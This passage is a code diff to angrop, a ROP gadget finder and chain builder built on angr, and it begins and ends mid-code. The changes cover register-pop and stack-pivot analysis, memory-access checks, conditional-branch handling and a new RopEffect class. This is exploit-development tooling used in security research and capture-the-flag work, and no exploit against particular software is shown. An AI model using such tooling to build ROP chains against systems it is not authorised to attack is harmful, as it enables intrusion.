type(gadget) == RopGadget else None @@ -459,10 +572,19 @@ def _check_reg_changes(self, final_state, init_state, gadget): # verify the stack controls it # we need to make sure they arent equal to the exit target otherwise they arent controlled # TODO what to do about moves to bp - if final_state.registers.load(reg) is exit_target: + ast = final_state.registers.load(reg) + if ast is exit_target or ast.variables.intersection(exit_target.variables): gadget.changed_regs.add(reg) - elif self._check_if_stack_controls_ast(final_state.registers.load(reg), init_state, stack_change): - gadget.popped_regs.add(reg) + elif self._check_if_stack_controls_ast(ast, final_state, stack_change): + if ast.op == 'Concat': + raise RopException("cannot handle Concat") + bits = self.project.arch.bits + extended = rop_utils.bits_extended(ast) + if extended is not None and bits == 64: + if extended <= 32: + bits = 32 + pop = RopRegPop(reg, bits) + gadget.reg_pops.add(pop) gadget.changed_regs.add(reg) else: gadget.changed_regs.add(reg) @@ -478,13 +600,43 @@ def _check_reg_change_dependencies(self, symbolic_state, symbolic_p, gadget): # skip popped regs if reg in gadget.popped_regs: continue - # check its dependencies + # check its dependencies and controllers dependencies = self._get_reg_dependencies(symbolic_p, reg) if len(dependencies) != 0: gadget.reg_dependencies[reg] = set(dependencies) - controllers = self._get_reg_controllers(symbolic_state, symbolic_p, reg, dependencies) - if len(controllers) != 0: - gadget.reg_controllers[reg] = set(controllers) + controllers = self._get_reg_controllers(symbolic_state, symbolic_p, reg, dependencies) + if controllers: + gadget.reg_controllers[reg] = set(controllers) + + def _check_pop_equal_set(self, gadget, final_state): + """ + identify the situation where the final registers are dependent on each other + e.g. in `pop rax; mov rbx, rax; add rbx, 1; ret;` rax and rbx are set by the same variable + """ + + d = defaultdict(list) + for reg in self.arch.reg_list: + ast = final_state.registers.load(reg) + for v in ast.variables: + d[v].append(reg) + for v, regs in d.items(): + if not regs: + continue + if not v.startswith("symbolic_stack"): + continue + gadget.pop_equal_set.add(tuple(regs)) + + @staticmethod + def _is_add_int(final_val, init_val): + if final_val.depth != 2 or final_val.op not in ("__add__", "__sub__"): + return False + arg0 = final_val.args[0] + arg1 = final_val.args[1] + if arg0 is init_val: + return not arg1.symbolic + if arg1 is init_val: + return not arg0.symbolic + return False def _check_reg_movers(self, init_state, final_state, gadget): """ @@ -502,9 +654,14 @@ def _check_reg_movers(self, init_state, final_state, gadget): if not var_name.startswith("sreg_"): continue from_reg = var_name[5:].split('-')[0] + # rax->rax (32bit) is not a move, it is a register change + if from_reg == reg: + continue init_val = init_state.registers.load(from_reg) if init_val is final_val: gadget.reg_moves.append(RopRegMove(from_reg, reg, self.project.arch.bits)) + elif self._is_add_int(final_val, init_val): # rax = rbx + should be also considered as move + gadget.reg_moves.append(RopRegMove(from_reg, reg, self.project.arch.bits)) else: # try lower 32 bits (this is intended for amd64) # TODO: do this for less bits too? @@ -526,7 +683,7 @@ def _check_for_control_type(self, init_state, final_state): return 'syscall' # the ip is controlled by stack (ret) - if self._check_if_stack_controls_ast(ip, init_state): + if self._check_if_stack_controls_ast(ip, final_state): return "stack" # the ip is not controlled by regs/mem @@ -570,13 +727,11 @@ def _check_if_jump_gadget(final_state, init_state): return True - def _check_if_stack_controls_ast(self, ast, initial_state, gadget_stack_change=None): + @staticmethod + def _check_if_stack_controls_ast(ast, final_state, gadget_stack_change=None): if gadget_stack_change is not None and gadget_stack_change <= 0: return False - # if we had the lemma cache this might be already there! - test_val = 0x4242424242424242 % (1 << self.project.arch.bits) - # TODO add test where we recognize a value past the end of the stack frame isn't controlled # this is an annoying problem but this code should handle it @@ -584,17 +739,12 @@ def _check_if_stack_controls_ast(self, ast, initial_state, gadget_stack_change=N if len(ast.variables) != 1 or not list(ast.variables)[0].startswith("symbolic_stack"): return False - stack_bytes_length = self._stack_bsize # number of controllable bytes - if gadget_stack_change is not None: - stack_bytes_length = min(max(gadget_stack_change, 0), stack_bytes_length) - concrete_stack = claripy.BVV(b"B" * stack_bytes_length) - const = initial_state.memory.load(initial_state.regs.sp, stack_bytes_length) == concrete_stack - test_constraint = ast != test_val - # stack must have set the register and it must be able to set the register to all 1's or all 0's - ans = not initial_state.solver.satisfiable(extra_constraints=(const, test_constraint,)) and \ - rop_utils.fast_unconstrained_check(initial_state, ast) - - return ans + # check whether it is loosely constrained if it is constrained + if ast.variables.intersection(final_state.solver._solver.variables): + return rop_utils.loose_constrained_check(final_state, ast) + # if it is not constrained, check whether it is a decent ast + # (symbolic_stack_0_0_32 >> 0x1f) is not because we only control 1 bit + return rop_utils.fast_unconstrained_check(final_state, ast) def _check_if_stack_pivot(self, init_state, final_state): ip_variables = list(final_state.ip.variables) @@ -626,7 +776,8 @@ def _check_if_stack_pivot(self, init_state, final_state): return None # if the saved ip is too far away from the final sp, that's a bad gadget - sols = final_state.solver.eval_upto(final_state.regs.sp - saved_ip_addr, 2) + sols = final_state.solver.eval_to_ast(final_state.regs.sp - saved_ip_addr, 2) + sols = [x.concrete_value for x in sols] if len(sols) != 1: # the saved ip has a symbolic distance from the final sp, bad return None offset = sols[0] @@ -658,11 +809,12 @@ def _compute_sp_change(self, init_state, final_state, gadget): raise RopException("SP has multiple dependencies") if len(dependencies) == 0 and sp_change.symbolic: raise RopException("SP change is uncontrolled") - assert self.arch.base_pointer not in dependencies + assert not dependencies if len(dependencies) == 0 and not sp_change.symbolic: stack_changes = [init_state.solver.eval(sp_change)] elif list(dependencies)[0] == self.arch.stack_pointer: - stack_changes = init_state.solver.eval_upto(sp_change, 2) + stack_changes = init_state.solver.eval_to_ast(sp_change, 2) + stack_changes = [x.concrete_values for x in stack_changes] else: raise RopException("SP does not depend on SP or BP") @@ -670,16 +822,21 @@ def _compute_sp_change(self, init_state, final_state, gadget): raise RopException("SP change is symbolic") gadget.stack_change = self._to_signed(stack_changes[0]) + if gadget.stack_change % self.project.arch.bytes != 0 or abs(gadget.stack_change) > 0x1000: + raise RopException("bad SP") elif type(gadget) is PivotGadget: - # FIXME: step_to_unconstrained_successor is not compatible with conditional_branches - final_state = rop_utils.step_to_unconstrained_successor(self.project, state=init_state, precise_action=True) dependencies = self._get_reg_dependencies(final_state, "sp") last_sp = None init_sym_sp = None # type: ignore prev_act = None bits = self.project.arch.bits + max_prev_pivot_sc = 0 for act in final_state.history.actions: + if act.type == 'mem' and not act.addr.ast.symbolic: + end = act.addr.ast.concrete_value + act.size//8 + sc = end - self._concrete_sp + max_prev_pivot_sc = max(max_prev_pivot_sc, sc) if act.type == 'reg' and act.action == 'write' and act.size == bits and \ act.storage == self.arch.stack_pointer: if not act.data.ast.symbolic: @@ -693,7 +850,10 @@ def _compute_sp_change(self, init_state, final_state, gadget): else: gadget.stack_change = 0 - assert init_sym_sp is not None, "there is no sybmolic sp, how does the pivoting work?" + gadget.stack_change_before_pivot = max_prev_pivot_sc + + if init_sym_sp is None: + raise RopException("PivotGadget does not work with conditional branches") # if is popped from stack, we need to compensate for the popped sp value on the stack # if it is a pop, then sp comes from stack and the previous action must be a mem read @@ -704,12 +864,19 @@ def _compute_sp_change(self, init_state, final_state, gadget): gadget.stack_change += self.project.arch.bytes assert init_sym_sp is not None - sols = final_state.solver.eval_upto(final_state.regs.sp - init_sym_sp, 2) + sols = final_state.solver.eval_to_ast(final_state.regs.sp - init_sym_sp, 2) + sols = [x.concrete_value for x in sols] if len(sols) != 1: raise RopException("This gadget pivots more than once, which is currently not handled") gadget.stack_change_after_pivot = sols[0] gadget.sp_reg_controllers = set(self._get_reg_controllers(init_state, final_state, 'sp', dependencies)) gadget.sp_stack_controllers = {x for x in final_state.regs.sp.variables if x.startswith("symbolic_stack_")} + if gadget.stack_change_before_pivot % self.project.arch.bytes != 0 or \ + abs(gadget.stack_change_before_pivot) > 0x1000: + raise RopException("bad SP") + if gadget.stack_change_after_pivot % self.project.arch.bytes != 0 or \ + abs(gadget.stack_change_after_pivot) > 0x1000: + raise RopException("bad SP") else: raise NotImplementedError(f"Unknown gadget type {type(gadget)}") @@ -721,8 +888,19 @@ def _build_mem_access(self, a, gadget, init_state, final_state): # handle the memory access address # case 1: the address is not symbolic - if not a.addr.ast.symbolic: - mem_access.addr_constant = init_state.solver.eval(a.addr.ast) + if not a.addr.ast.symbolic or all(x.startswith('sym_addr_') for x in a.addr.ast.variables): + if not a.addr.ast.symbolic: + addr_constant = a.addr.ast.concrete_value + else: + addr_constant = final_state.solver.eval(a.addr.ast) + mem_access.addr_constant = addr_constant + mem_access.stack_offset = addr_constant - init_state.regs.sp.concrete_value + if not final_state.regs.sp.symbolic: + # check whether this is a pointer to a known mapping, these are not considered out-of-patch + if self.project.loader.find_object_containing(addr_constant): + pass + elif not init_state.regs.sp.concrete_value <= addr_constant < final_state.regs.sp.concrete_value: + mem_access.out_of_patch = True # case 2: the symbolic address comes from registers elif all(x.startswith("sreg_") for x in a.addr.ast.variables): mem_access.addr_dependencies = rop_utils.get_ast_dependency(a.addr.ast) @@ -765,7 +943,10 @@ def _build_mem_access(self, a, gadget, init_state, final_state): if not succ_state.solver.satisfiable(extra_constraints=(test_constraint,)): mem_access.data_dependencies.add(reg) - mem_access.data_size = a.data.ast.size() + data_ast = a.data.ast + while data_ast.op in ('ZeroExt', 'SignExt'): + data_ast = data_ast.args[1] + mem_access.data_size = data_ast.size() mem_access.addr_size = a.addr.ast.size() return mem_access @@ -807,15 +988,19 @@ def _build_mem_change(self, read_action, write_action, gadget, init_state, final # such as mov rax, [rbx]; inc rax; mov [rbx], rax, # this gadget will be ignored by us, which is not great data_dependencies = rop_utils.get_ast_dependency(sym_data) - if len(data_dependencies) != 1: - return None - data_controllers = rop_utils.get_ast_controllers(init_state, sym_data, data_dependencies) - if len(data_controllers) != 1: - return None + data_controllers = set() + data_stack_controllers = set() + if len(data_dependencies): + data_controllers = rop_utils.get_ast_controllers(init_state, sym_data, data_dependencies) + if len(data_controllers) != 1: + return None + data_stack_controllers = {x for x in sym_data.variables if x.startswith('symbolic_stack')} + mem_change = self._build_mem_access(read_action, gadget, init_state, final_state) mem_change.op = write_action.data.ast.op mem_change.data_dependencies = data_dependencies + mem_change.data_stack_controllers = data_stack_controllers mem_change.data_controllers = data_controllers mem_change.data_size = write_action.data.ast.size() mem_change.addr_size = write_action.addr.ast.size() @@ -887,15 +1072,38 @@ def _analyze_mem_access(self, final_state, init_state, gadget): if pivot_done and a.addr.ast.symbolic and not a.addr.ast.variables - sp_vars: continue - # ignore read/write on stack + # ignore read/write within the stack patch if not a.addr.ast.symbolic: - addr_constant = init_state.solver.eval(a.addr.ast) - stack_min_addr = self._concrete_sp - 0x20 - # TODO should this be changed, so that we can more easily understand writes outside the frame - stack_max_addr = max(stack_min_addr + self._stack_bsize, stack_min_addr + gadget.stack_change) - if addr_constant is not None and \ - stack_min_addr <= addr_constant < stack_max_addr: + addr_constant = a.addr.ast.concrete_value + + # check whether the access is within the stack patch + # we ignore pushes, which will lead to under patch write then load + upper_bound = (1< 0x400: + return False + all_mem_actions.append(a) # step 2: identify memory change accesses by indexing using the memory address as the key @@ -919,7 +1127,9 @@ def _analyze_mem_access(self, final_state, init_state, gadget): for m in d[addr]: all_mem_actions.remove(m) - if len(all_mem_actions) + len(gadget.mem_changes) > self.arch.max_sym_mem_access: + sym_accesses = [ m for m in all_mem_actions if m.addr.ast.symbolic ] + sym_accesses += [m for m in gadget.mem_changes if m.is_symbolic_access()] + if len(sym_accesses) > self.arch.max_sym_mem_access: return False # step 3: add all left memory actions to either read/write memory accesses stashes @@ -986,7 +1196,7 @@ def _get_reg_writes(self, path): if a.type == "reg" and a.action == "write": try: reg_name = rop_utils.get_reg_name(self.project.arch, a.offset) - if reg_name in self.arch.reg_set: + if reg_name in self.arch.reg_list: all_reg_writes.add(reg_name) elif reg_name != self.arch.stack_pointer: l.info("reg write from register not in reg_set: %s", reg_name) @@ -994,5 +1204,94 @@ def _get_reg_writes(self, path): l.debug(e) return all_reg_writes + def _block_has_ip_relative(self, addr, bl): + """ + Checks if a block has any ip relative instructions + """ + # if thumb mode, the block needs to parsed very carefully + if addr & 1 == 1 and self.project.arch.bits == 32 and self.project.arch.name.startswith('ARM'): + # thumb mode has this conditional instruction thingy, which is terrible for vex statement + # comparison. We inject a ton of fake statements into the program to ensure vex that this gadget + # is not a conditional instruction + MMAP_ADDR = 0x1000 + test_addr = MMAP_ADDR + 0x200+1 + if self.project.loader.memory.min_addr > MMAP_ADDR: + # a ton of `pop {pc}` + self.project.loader.memory.add_backer(MMAP_ADDR, b'\x00\xbd'*0x100+b'\x00'*0x200) + + # create the block without using the cache + engine = self.project.factory.default_engine + bk = engine._use_cache + engine._use_cache = False + self.project.loader.memory.store(test_addr-1, bl.bytes + b'\x00'*(0x200-len(bl.bytes))) + bl2 = self.project.factory.block(test_addr) + engine._use_cache = bk + else: + test_addr = 0x41414140 + addr % 0x10 + bl2 = self.project.factory.block(test_addr, insn_bytes=bl.bytes) + + # now diff the blocks to see whether anything constants changes + try: + diff_constants = differing_constants(bl, bl2) + except UnmatchedStatementsException: + return True + # check if it changes if we move it + bl_end = addr + bl.size + bl2_end = test_addr + bl2.size + filtered_diffs = [] + for d in diff_constants: + if d.value_a < addr or d.value_a >= bl_end or \ + d.value_b < test_addr or d.value_b >= bl2_end: + filtered_diffs.append(d) + return len(filtered_diffs) > 0 + + def _is_simple_gadget(self, addr, block): + """ + is the gadget a simple gadget like + pop rax; ret + """ + if block.vex.jumpkind not in {'Ijk_Boring', 'Ijk_Call', 'Ijk_Ret'}: + return False + if block.vex.jumpkind.startswith('Ijk_Sys_'): + return False + if block.vex.constant_jump_targets: + return False + if self._block_has_ip_relative(addr, block): + return False + return True -# TODO ip setters, ie call rax + def block_hash(self, block): + """ + a hash to uniquely identify a simple block + """ + if block.vex_nostmt.jumpkind.startswith('Ijk_Sys_'): + next_addr = block.addr + block.size + obj = self.project.loader.find_object_containing(next_addr) + if not obj: + return block.bytes + next_block = self.project.factory.block(next_addr, skip_stmts=True) + return block.bytes + next_block.bytes + return block.bytes + + def _static_analyze_first_block(self, addr): + try: + bl = self.project.factory.block(addr, skip_stmts=True) + if bl.size > self.arch.max_block_size: + return None, None + jumpkind = bl._vex_nostmt.jumpkind + if jumpkind in ('Ijk_SigTRAP', 'Ijk_NoDecode', 'Ijk_Privileged', 'Ijk_Yield'): + return None, None + if not self._allow_conditional_branches and len(bl._vex_nostmt.constant_jump_targets) > 1: + return None, None + if self._fast_mode and jumpkind not in ("Ijk_Ret", "Ijk_Boring") and not jumpkind.startswith('Ijk_Sys_'): + return None, None + if bl._vex_nostmt.instructions == 1 and jumpkind in ('Ijk_Boring', 'Ijk_Call'): + return None, None + if not self._block_make_sense(addr): + return None, None + except (SimEngineError, SimMemoryError): + return None, None + if self._is_simple_gadget(addr, bl): + h = self.block_hash(bl) + return h, addr + return None, addr diff --git a/angrop/rop.py b/angrop/rop.py index 8c2e6b2c..bf82b29f 100644 --- a/angrop/rop.py +++ b/angrop/rop.py @@ -22,7 +22,9 @@ class ROP(Analysis): """ def __init__(self, only_check_near_rets=True, max_block_size=None, max_sym_mem_access=None, - fast_mode=None, rebase=None, is_thumb=False, kernel_mode=False, stack_gsize=80): + fast_mode=None, rebase=None, is_thumb=False, kernel_mode=False, stack_gsize=80, + cond_br=False, max_bb_cnt=2 + ): """ Initializes the rop gadget finder :param only_check_near_rets: If true we skip blocks that are not near rets @@ -34,7 +36,9 @@ def __init__(self, only_check_near_rets=True, max_block_size=None, max_sym_mem_a :param is_thumb: execute ROP chain in thumb mode. Only makes difference on ARM architecture. angrop does not switch mode within a rop chain :param kernel_mode: find kernel mode gadgets - :param stack_gsize: change the maximum allowable stack change for gadgets + :param stack_gsize: change the maximum allowable stack change for gadgets, where + the max stack_change = stack_gsize * arch.bytes + :param cond_br: whether to support conditional branches, this option impacts gadget finding speed significantly :return: """ @@ -55,7 +59,8 @@ def __init__(self, only_check_near_rets=True, max_block_size=None, max_sym_mem_a # gadget finder configurations self.gadget_finder = GadgetFinder(self.project, fast_mode=fast_mode, only_check_near_rets=only_check_near_rets, max_block_size=max_block_size, max_sym_mem_access=max_sym_mem_access, - is_thumb=is_thumb, kernel_mode=kernel_mode, stack_gsize=stack_gsize) + is_thumb=is_thumb, kernel_mode=kernel_mode, stack_gsize=stack_gsize, + cond_br=cond_br, max_bb_cnt=max_bb_cnt) self.arch = self.gadget_finder.arch # chain builder @@ -122,7 +127,7 @@ def analyze_gadget(self, addr): self._screen_gadgets() return g - def analyze_gadget_list(self, addr_list, processes=4, show_progress=True): + def analyze_gadget_list(self, addr_list, processes=4, show_progress=True, optimize=True): """ Analyzes a list of addresses to identify ROP gadgets. Saves rop gadgets in self.rop_gadgets @@ -135,22 +140,28 @@ def analyze_gadget_list(self, addr_list, processes=4, show_progress=True): self._all_gadgets = self.gadget_finder.analyze_gadget_list( addr_list, processes=processes, show_progress=show_progress) self._screen_gadgets() + if optimize: + self.chain_builder.optimize(processes=processes) return self.rop_gadgets - def find_gadgets(self, processes=4, show_progress=True): + def find_gadgets(self, optimize=True, **kwargs): """ Finds all the gadgets in the binary by calling analyze_gadget on every address near a ret. Saves rop gadgets in self.rop_gadgets Saves syscall gadgets in self.syscall_gadgets Saves stack pivots in self.stack_pivots :param processes: number of processes to use + :param optimize: whether to run chain_builder.optimize(), this may take some time, + but makes the chain builder more powerful """ - self._all_gadgets, self._duplicates = self.gadget_finder.find_gadgets(processes=processes, - show_progress=show_progress) + self._all_gadgets, self._duplicates = self.gadget_finder.find_gadgets(**kwargs) self._screen_gadgets() + if optimize: + processes = kwargs.get('processes', 4) + self.chain_builder.optimize(processes=processes) return self.rop_gadgets - def find_gadgets_single_threaded(self, show_progress=True): + def find_gadgets_single_threaded(self, show_progress=True, optimize=True): """ Finds all the gadgets in the binary by calling analyze_gadget on every address near a ret Saves rop gadgets in self.rop_gadgets @@ -160,6 +171,8 @@ def find_gadgets_single_threaded(self, show_progress=True): self._all_gadgets, self._duplicates = self.gadget_finder.find_gadgets_single_threaded( show_progress=show_progress) self._screen_gadgets() + if optimize: + self.chain_builder.optimize(processes=1) return self.rop_gadgets def _get_cache_tuple(self): @@ -185,7 +198,7 @@ def save_gadgets(self, path): for g in self._all_gadgets: g.project = self.project - def load_gadgets(self, path): + def load_gadgets(self, path, optimize=True): """ Loads gadgets from a file. :param path: A path for a file where the gadgets are loaded @@ -193,6 +206,8 @@ def load_gadgets(self, path): with open(path, "rb") as f: cache_tuple = pickle.load(f) self._load_cache_tuple(cache_tuple) + if optimize: + self.chain_builder.optimize() def set_badbytes(self, badbytes): """ diff --git a/angrop/rop_block.py b/angrop/rop_block.py index c22bf7cd..f557ad48 100644 --- a/angrop/rop_block.py +++ b/angrop/rop_block.py @@ -1,9 +1,15 @@ +import logging + from .rop_chain import RopChain from .rop_value import RopValue from .rop_gadget import RopGadget +from .rop_effect import RopEffect +from .errors import RopException from . import rop_utils -class RopBlock(RopChain): +l = logging.getLogger(__name__) + +class RopBlock(RopChain, RopEffect): """ A mini-chain that satisfies the following conditions: 1. positive stack_change @@ -14,38 +20,8 @@ class RopBlock(RopChain): """ def __init__(self, project, builder, state=None, badbytes=None): - super().__init__(project, builder, state=state, badbytes=badbytes) - - self.stack_change = None - - # register effect information - self.changed_regs = set() - self.popped_regs = set() - # Stores the stack variables that each register depends on. - # Used to check for cases where two registers are popped from the same location. - self.popped_reg_vars = {} - self.concrete_regs = {} - self.reg_dependencies = {} # like rax might depend on rbx, rcx - self.reg_controllers = {} # like rax might be able to be controlled by rbx (for any value of rcx) - self.reg_moves = [] - - # memory effect information - self.mem_reads = [] - self.mem_writes = [] - self.mem_changes = [] - - self.bbl_addrs = [] - self.isn_count: int = None # type: ignore - - @staticmethod - def new_sim_state(builder): - state = builder._sim_state - return state.copy() - - @property - def num_sym_mem_access(self): - accesses = set(self.mem_reads + self.mem_writes + self.mem_changes) - return len([x for x in accesses if x.is_symbolic_access()]) + RopChain.__init__(self, project, builder, state=state, badbytes=badbytes) + RopEffect.__init__(self) def _chain_block(self, other): assert type(other) is RopBlock @@ -63,34 +39,31 @@ def _analyze_effect(self): ga = self._builder._gadget_analyzer + # clear the effects + rb.clear_effect() + # stack change ga._compute_sp_change(init_state, final_state, rb) - # clear the effects - rb.changed_regs = set() - rb.popped_regs = set() - rb.popped_reg_vars = {} - rb.concrete_regs = {} - rb.reg_dependencies = {} - rb.reg_controllers = {} - rb.reg_moves = [] - rb.mem_reads = [] - rb.mem_writes = [] - rb.mem_changes = [] - # reg effect ga._check_reg_changes(final_state, init_state, rb) ga._check_reg_change_dependencies(init_state, final_state, rb) ga._check_reg_movers(init_state, final_state, rb) + ga._check_pop_equal_set(rb, final_state) # mem effect - ga._analyze_concrete_regs(init_state, final_state, rb) + ga._analyze_concrete_regs(final_state, rb) ga._analyze_mem_access(final_state, init_state, rb) rb.bbl_addrs = list(final_state.history.bbl_addrs) project = init_state.project rb.isn_count = sum(project.factory.block(addr).instructions for addr in rb.bbl_addrs) + # conditional branch analysis + ga._cond_branch_analysis(rb, final_state) + if rb.branch_dependencies: + raise RopException("RopBlock should not have conditional branches") + def sim_exec(self): project = self._p # this is different RopChain.exec because the execution needs to be symbolic @@ -104,24 +77,12 @@ def sim_exec(self): simgr = self._p.factory.simgr(state, save_unconstrained=True) while simgr.active: simgr.step() - assert len(simgr.active + simgr.unconstrained) == 1 + if len(simgr.active + simgr.unconstrained) != 1: + l.warning("fail to sim_exec:\n%s", self.dstr()) + raise RopException("fail to sim_exec") final_state = simgr.unconstrained[0] return state, final_state - def import_gadget_effect(self, gadget): - self.stack_change = gadget.stack_change - self.changed_regs = gadget.changed_regs - self.popped_regs = gadget.popped_regs - self.popped_reg_vars = gadget.popped_reg_vars - self.concrete_regs = gadget.concrete_regs - self.reg_dependencies = gadget.reg_dependencies - self.reg_controllers = gadget.reg_controllers - self.reg_moves = gadget.reg_moves - self.mem_reads = gadget.mem_reads - self.mem_writes = gadget.mem_writes - self.mem_changes = gadget.mem_changes - self.isn_count = gadget.isn_count - @staticmethod def from_gadget(gadget, builder): assert isinstance(gadget, RopGadget) @@ -132,7 +93,10 @@ def from_gadget(gadget, builder): # build the block(chain) state first project = builder.project bytes_per_pop = project.arch.bytes - state = RopBlock.new_sim_state(builder) + state = rop_utils.make_symbolic_state( + builder.project, + builder.arch.reg_list, + gadget.stack_change//bytes_per_pop) next_pc_val = rop_utils.cast_rop_value( state.solver.BVS("next_pc", project.arch.bits), project, @@ -144,7 +108,7 @@ def from_gadget(gadget, builder): # now build the block(chain) rb = RopBlock(project, builder, state=state, badbytes=builder.badbytes) - rb.import_gadget_effect(gadget) + rb.import_effect(gadget) # fill in values and gadgets value = RopValue(gadget.addr, project) @@ -165,8 +129,36 @@ def from_gadget(gadget, builder): def from_gadget_list(gs, builder): assert gs rb = RopBlock.from_gadget(gs[0], builder) + project = builder.project + arch_bytes = project.arch.bytes for g in gs[1:]: - rb = rb._chain_block(RopBlock.from_gadget(g, builder)) + if g.self_contained: + rb = rb._chain_block(RopBlock.from_gadget(g, builder)) + elif g.stack_change >= 0 and g.transit_type == 'jmp_reg': + init_state, final_state = rb.sim_exec() + new_vals = [] + for offset in range(0, g.stack_change, arch_bytes): + tmp = final_state.memory.load(final_state.regs.sp+offset, + arch_bytes, + endness=project.arch.memory_endness) + new_vals.append(rop_utils.cast_rop_value(tmp, project)) + rb._values[rb.next_pc_idx()] = rop_utils.cast_rop_value(g.addr, project) # type: ignore + + final_state.solver.add(final_state.ip == g.addr) + final_state = rop_utils.step_to_unconstrained_successor(project, final_state) + rb._gadgets.append(g) + rb._values += new_vals + rb.payload_len += len(new_vals)*arch_bytes + ip_hash = hash(final_state.ip) + for idx, val in enumerate(rb._values): + if val.symbolic and hash(val.ast) == ip_hash: + next_pc_val = rop_utils.cast_rop_value( + init_state.solver.BVS("next_pc", project.arch.bits), + project, + ) + rb._values[idx] = next_pc_val + else: + raise NotImplementedError("plz create an issue") rb._analyze_effect() return rb @@ -181,22 +173,7 @@ def from_chain(chain): rb._analyze_effect() return rb - def has_symbolic_access(self): - accesses = set(self.mem_reads + self.mem_writes + self.mem_changes) - return any(x.is_symbolic_access() for x in accesses) - def copy(self): cp = super().copy() - cp.changed_regs = set(self.changed_regs) - cp.popped_regs = set(self.popped_regs) - cp.popped_reg_vars = dict(self.popped_reg_vars) - cp.concrete_regs = dict(self.concrete_regs) - cp.reg_dependencies = dict(self.reg_dependencies) - cp.reg_controllers = dict(self.reg_controllers) - cp.stack_change = self.stack_change - cp.reg_moves = list(self.reg_moves) - cp.mem_reads = list(self.mem_reads) - cp.mem_writes = list(self.mem_writes) - cp.mem_changes = list(self.mem_changes) - cp.isn_count = self.isn_count + cp = self.copy_effect(cp) return cp diff --git a/angrop/rop_chain.py b/angrop/rop_chain.py index 8a0dd4a9..2d690f6e 100644 --- a/angrop/rop_chain.py +++ b/angrop/rop_chain.py @@ -1,5 +1,7 @@ import logging +import angr + from . import rop_utils from .errors import RopException from .rop_gadget import RopGadget @@ -22,18 +24,22 @@ def __init__(self, project, builder, state=None, badbytes=None): self._pie = self._p.loader.main_object.pic self._builder = builder - self._gadgets = [] - self._values = [] + self._gadgets: list[RopGadget] = [] # gadgets in the order of execution + self._values: list[RopValue] = [] # values on the stack + # use self.payload_len in presentation layer, use self._payload in internal stuff # because next_pc is an internal mechanism, we don't expose it to users self.payload_len = 0 # blank state used for solving - self._blank_state = self._p.factory.blank_state() if state is None else state + self._blank_state = rop_utils.make_symbolic_state(self._p, builder.arch.reg_list, 0) if state is None else state self.badbytes = badbytes if badbytes else [] self._timeout = self.cls_timeout + self._pivoted = False + self._init_sp = None + def __add__(self, other): # need to add the values from the other's stack and the constraints to the result state result = self.copy() @@ -54,6 +60,13 @@ def __add__(self, other): result.payload_len -= self._p.arch.bytes else: result._values.extend(other._values) + + # FIXME: cannot handle cases where a rop_block is used twice and have different constraints + # because right now symbolic values go with rop_blocks + if self._blank_state.solver._solver.variables.intersection(other._blank_state.solver._solver.variables): + if not result._blank_state.satisfiable(): + raise RopException("cannot use a rop_block with different constraints yet") + return result def set_timeout(self, timeout): @@ -115,13 +128,31 @@ def find_symbol(self, addr): return symbol.name return None - def exec(self, timeout=None): + def _check_pivot(self, s): + bits = self._p.arch.bits + for act in s.history.actions.hardcopy: + if act.type == 'reg' and act.action == 'write': + reg_name = self._p.arch.translate_register_name(act.offset) + if reg_name != self._builder.arch.stack_pointer: + continue + diff = act.data.ast - self._init_sp + if diff.symbolic: + self._pivoted = True + return + value = diff.concrete_value + if value >> (bits-1): # if the MSB is 1, this value is negative + value -= (1<= 0x1000 or value < -0x1000: + self._pivoted = True + return + + def exec(self, timeout=None, stop_at_pivot=False): """ symbolically execute the ROP chain and return the final state """ + # pylint: disable=possibly-used-before-assignment project = self._p state = self._blank_state.copy() - state.solver.reload_solver([]) # remove constraints concrete_vals = self._concretize_chain_values(timeout=timeout, preserve_next_pc=True, append_shift=False) # when the chain data includes symbolic values, we need to replace the concrete values @@ -140,10 +171,21 @@ def exec(self, timeout=None): state.memory.store(state.regs.sp+offset, val[0], project.arch.bytes, endness=project.arch.memory_endness) state.regs.pc = state.stack_pop() - # execute the chain using simgr + if stop_at_pivot: + self._pivoted = False + self._init_sp = state.regs.sp + bp = state.inspect.b('reg_write', when=angr.BP_AFTER, action=self._check_pivot) + simgr = project.factory.simgr(state, save_unconstrained=True) + + # execute the chain using simgr while simgr.active: simgr.step() + if stop_at_pivot and self._pivoted: + states = simgr.active + simgr.unconstrained + assert len(states) == 1 + states[0].inspect.remove_breakpoint('reg_write', bp) # type: ignore + return states[0] if len(simgr.active + simgr.unconstrained) != 1: code = self.payload_code(print_instructions=True) l.error("The following chain fails to execute!") @@ -164,7 +206,7 @@ def concrete_exec_til_addr(self, target_addr): def sim_exec_til_syscall(self): project = self._p - state = project.factory.blank_state() + state = self._blank_state.copy() for idx, val in enumerate(self._values): offset = idx*project.arch.bytes state.memory.store(state.regs.sp+offset, val.data, project.arch.bytes, endness=project.arch.memory_endness) @@ -205,7 +247,7 @@ def __concretize_chain_values(self, constraints=None): # for each byte, it should not be equal to any bad bytes # TODO: we should do the badbyte verification when adding values # not when concretizing them - for idx in range(ast.length//8): + for idx in range(ast.length//8): # type: ignore b = ast.get_byte(idx) constraints += [ b != c for c in self.badbytes] # apply the constraints @@ -366,3 +408,23 @@ def dstr(self): def pp(self): print(self.dstr()) + + def set_project(self, project): + self._p = project + for g in self._gadgets: + g.project = project + for val in self._values: + val._project = project + + def set_builder(self, builder): + self._builder = builder + + def __getstate__(self): + state = self.__dict__.copy() + state['_p'] = None + state['_builder'] = None + state['_blank_state'] = None + return state + + def __setstate__(self, state): + self.__dict__.update(state) diff --git a/angrop/rop_effect.py b/angrop/rop_effect.py new file mode 100644 index 00000000..39fccbda --- /dev/null +++ b/angrop/rop_effect.py @@ -0,0 +1,215 @@ +class RopMemAccess: + """Holds information about memory accesses + Attributes: + addr_dependencies (set): All the registers that affect the memory address. + addr_controller (set): All the registers that can determine the symbolic memory access address by itself + addr_offset (int): Constant offset in the memory address relative to register(s) + addr_stack_controller (set): all the controlled gadgets on the stack that can determine the address by itself + data_dependencies (set): All the registers that affect the data written. + data_controller (set): All the registers that can determine the symbolic data by itself + addr_constant (int): If the address is a constant it is stored here. + data_constant (int): If the data is constant it is stored here. + addr_size (int): Number of bits used for the address. + data_size (int): Number of bits used for data + """ + def __init__(self): + self.addr_dependencies = set() + self.addr_controllers = set() + self.addr_offset: int | None = None + self.addr_stack_controllers = set() + self.data_dependencies = set() + self.data_controllers = set() + self.data_stack_controllers = set() + self.addr_constant = None + self.stack_offset = None # addr_constant - init_sp + self.data_constant = None + self.addr_size = None + self.data_size = None + self.out_of_patch = False + self.op = None + + def is_valid(self): + """ + the memory access address must be one of + 1. constant + 2. controlled by registers + 3. controlled by controlled stack + """ + return 